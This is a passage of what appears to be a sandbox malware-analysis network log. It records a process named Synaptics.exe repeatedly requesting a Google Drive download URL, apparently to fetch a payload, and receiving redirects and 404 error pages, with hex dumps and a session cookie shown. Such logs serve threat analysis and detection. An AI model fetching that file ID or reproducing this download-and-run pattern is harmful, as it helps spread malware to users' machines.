                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:12 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Zl26J3pqXRZay-1MKECL2Z6LS_lL46DX4gvus9UWPE1TAxa_adE-Pse_9mRlHLiH3
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:11 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Ti0ksmSDpVsvysrtMIa1Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:12 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:12 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 38 57 54 61 62 65 38 46 50 4c 53 48 6c 72 42 49 58 55 31 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="a8WTabe8FPLSHlrBIXU1xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:12 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    114192.168.2.452160142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:11 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:11 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CV8BICbtnM8_0H2L-YELow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    115192.168.2.452164142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:11 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:12 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:12 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZaAn2-fn4bJzFmEfB6seeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    116192.168.2.452163142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5umVmUg-MvcMbTn5tZdJbqzoTbojs_Z-LeKWdq0tVTznRs7hYnGxMWY_M2Ff892ifNV4hfgU4
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:12 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-s4jzROrwxHyBJb_MKRY58g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 6d 47 43 35 36 47 33 51 43 6c 35 6b 35 31 70 2d 49 37 44 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="smGC56G3QCl5k51p-I7DSw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    117192.168.2.452172142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:13 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC64IAVxJGF8T-h5GQXygONngQOY4R1i_k1I2XeGay_IzRpdhxc8DUJDu-h_cvKac7_R
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:12 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZligGJ1qrhVe58-cA3j4qQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 67 6d 6c 75 6e 7a 70 33 37 6b 78 6e 32 70 46 4c 6d 31 42 72 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="Pgmlunzp37kxn2pFLm1Brg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    118192.168.2.452170142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:12 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:12 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DHJ3gWhb4LkIFNR4Ljl-GA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    119192.168.2.452179142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:12 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:13 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-USJoCdxmUEtERDqzyOv2kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    120192.168.2.452180142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
